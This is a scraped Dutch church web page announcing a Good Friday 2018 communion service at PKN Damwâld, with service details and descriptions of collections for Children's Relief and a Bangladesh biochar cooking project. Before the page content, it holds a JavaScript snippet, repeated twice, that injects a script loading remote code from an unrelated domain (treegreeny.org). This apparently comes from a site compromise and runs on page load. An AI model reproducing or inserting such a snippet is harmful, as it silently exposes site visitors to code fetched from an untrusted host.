;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Goede Vrijdag - PKN Damwâld
vrijdag 30 maart 2018
09:30 uur

Goede Vrijdag

Thema: Viering Heilig Avondmaal

Informatie

Voorganger:Ds. G. Timmer, Twijzelerheide
Organist:Ivo van Hijum
Thema:Viering Heilig Avondmaal
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Stichting Children’s Relief

Goede Vrijdag Kerk: Stichting Children's Relief - Ondersteuning voor kinderen in achterstandssituaties
Children's Relief ondersteunt kinderen die in Oost-Europa opgroeien in achterstandssituaties. Zij zijn het meest kwetsbaar en hebben weinig kans op een goede toekomst. De projecten van Children's Relief richten zich op scholing, opvoeding, zorg en aandacht. Het welzijn van de kinderen staat voorop. Zij moeten zich kunnen ontplooien tot gezonde volwassenen. Zo kunnen zij betere kansen krijgen in de maatschappij. Children's Relief heeft in haar geschiedenis al veel kinderen kunnen helpen en begeleiden naar een beter bestaan. Stichting Children's Relief is verbonden met Stichting OostEuropa Zending.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte

Goede Vrijdag Avondmaalscollecte: Klimaat- en inkomensverbetering op het platteland van Bangladesh (landbouwproject Kerk in Actie).
Bangladesh ie één van de meest dichtbevolkte landen ter wereld. Tegelijkertijd treffen de klimaatveranderingen het land hard. Maar liefst 20% van de kostbare landbouwgrond gaat verloren bij een stijging van de zeespiegel. Het klimaat kent veel langere perioden van droogte dan voorheen. Daarbij bedreigen perioden met extreme regenval de voedselvoorziening. CCDB (Christelijke Commissie voor Ontwikkeling in Bangladesh) ontwikkelde een plan voor milieuvriendelijker koken. Daarbij wordt het verstookte hout op meer wijzen benut. Een ingenieus kooktoestel gebruikt een minimum aan zuurstof, en zet hout voor 50% om in Biochar (lijkt op houtskool). Door organische mest aan de Biochar toe te voegen, wordt het gebruikt voor bodemverrijking. De Biochar neemt gemakkelijk voedingsstoffen voor planten op. En Biochar houdt water langer vast, dat een groot voordeel is in perioden van droogte. Het voordeel voor gebruikers van zogenaamde 'Akha' is dat binnenshuis minder rookontwikkeling is. Kortom; beter voor de gezondheid!